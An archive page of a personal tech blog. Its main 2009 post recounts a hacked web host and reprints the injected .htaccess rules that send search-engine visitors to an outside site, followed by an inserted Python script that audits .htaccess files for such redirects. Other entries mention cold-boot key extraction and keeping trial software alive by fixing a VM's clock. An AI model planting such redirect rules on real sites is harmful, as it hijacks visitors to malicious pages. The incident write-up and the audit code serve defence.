Archive for the Category » Technical «

Sunday, July 26th, 2009

It’s been a while since my last entry. A few things were happening: my blog engine went kaput a few weeks ago and it actually affected my Google ranking. 🙁 I saw a significant drop in search-engine-directed traffic.

Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery, when after a few clicks I got redirected to ask.com. I thought I hadn’t renewed my subscription or my domain hosting.

After checking my subscriptions, all was fine. I went into cPanel to poke around. What can cause redirections? I checked the redirection settings, sub-domains, etc. Finally I discovered some redirecting code in some of my .htaccess files.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder had been created in my public_html, “coming10/almost”. What’s almost, the hacking is almost done?
I found the following files inside:
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded JavaScript to redirect visitors to some site. MY VISITORS! I reported it to my web host; I wonder how much action they can take. They are using ClamAV to scan /home. Oh well… I’m expecting somebody to eyeball the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.
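A way to check every .htaccess for the two patterns in the sample above (ErrorDocument pointing at an outside URL, and a referer-conditioned RewriteRule to an outside host). This is an added example, not code from the original post; the hostnames, the sample text and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injected directives shown above;
# hostnames are placeholders, not indicators from a real incident.
SAMPLE = """\
ErrorDocument 404 /errors/404.html
ErrorDocument 500 http://redirector.example/in.cgi?8
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://redirector.example/in.cgi?7 [R=301,L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.mysite.example/$1 [R=301,L]
"""

def external_host(target, own_hosts):
    """Return the host if target is an absolute URL outside our own hosts."""
    host = urlparse(target).hostname
    if host and host.lower() not in own_hosts:
        return host.lower()
    return None

def audit_htaccess(text, own_hosts):
    """Return [(line_no, reason)] for directives that send visitors off-site."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            host = external_host(parts[2], own)
            if host:
                findings.append((no, f"ErrorDocument {parts[1]} -> {host}"))
        elif directive == "rewritecond" and len(parts) >= 2:
            # Conditions accumulate until the next RewriteRule consumes them.
            if "http_referer" in parts[1].lower():
                referer_cond = True
        elif directive == "rewriterule" and len(parts) >= 3:
            host = external_host(parts[2], own)
            if host:
                kind = "referer-gated" if referer_cond else "unconditional"
                findings.append((no, f"{kind} RewriteRule -> {host}"))
            referer_cond = False
    return findings
```

Because the redirect fires only for visitors arriving from a search engine, browsing the site directly will not show it; run the check over each .htaccess under public_html, passing the site's own hostnames as `own_hosts`.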


Category: Security, Technical

Sunday, November 02nd, 2008

The older cPanel version 10 does not have the option for changing to PHP5, so you need to add the following line to your .htaccess file:

AddType application/x-httpd-php5 .php

Category: Technical

Sunday, October 19th, 2008

I just read this article on using compressed air to cool a memory chip so it will retain data even after power has been cut off.

A video can be found here on the process and on why a colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack is not exploiting a weakness of the encryption software; it works because the keys have to be stored in memory. Encrypting the key in memory doesn’t really help, you still need to store the key that encrypts it somewhere!

Category: Security, Systems

Sunday, October 05th, 2008

My story on why I decided to change the phone lock timeout.

When I first powered on my HTC Touch Pro, I went through the start-up wizard, which prompted me to set a phone lock PIN and a timeout for activating the lock. I decided to go with 15 minutes, since I can change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

more…

Tuesday, September 30th, 2008

Now, this is interesting for you iPhone folks. Check Point is providing an IPsec VPN client for iPhone.

Link

Wednesday, April 30th, 2008

Well, most Singaporeans are pretty crippled recently due to a lawsuit between Singapore Land Authority and Virtual Maps, thus the mapping service from www.streetdirectory.com is not available currently.

So when I was in Auckland for a firewall deployment, the customer was showing his Blackberry with a mapping application, Mgmaps or Mobile Gmaps. He’s using it with a built-in GPS and the best part is, the maps are stored on his memory card. Offline browsing!

more…

Category: Mobiles, Technical

Wednesday, April 16th, 2008

Right, I’m slow with this SIP VOIP stuff. When I subscribed to Pfingo SIP service, I was searching high and low for the client for UIQ3, since Sony Ericsson P1 is supported.

more…

Category: Mobiles, Technical

Thursday, March 20th, 2008

I was looking for a way to force my VM to boot up with a specific date and time without going into the VM BIOS to change it every time I boot up.

I just need a VM for testing and evaluating certain software or platforms but I don’t like re-building it when the licenses expire.

Especially when trial software always expires in like 15 or 30 days ? 7 for a particular secure os and 15 for a particular secure platform. 🙂

more…

Category: Systems, Technical

Tuesday, January 08th, 2008

Well, if you have some DVDs that you would like to back up, here are the steps to do it.

Note: For non-encrypted DVDs, meaning personal home videos, non-commercially created DVDs, etc. 🙂

Step 1:

dvdbackup -M -i /dev/dvd -o ./outputdir/

-M tells it to make a full backup; there are other parameters to back up selected chapters.

dvdbackup will create the DVD folder structure under ./outputdir/<volume-name>

Step 2:

mkisofs -dvd-video -o dvd.iso ./outputdir/<volume-name>

Category: Linux, Technical

Thursday, January 03rd, 2008

If you installed Back Track 2 onto your HDD and you want to update the aircrack-ng suite, here are the commands to do so.

more…

Category: Linux, Security, Technical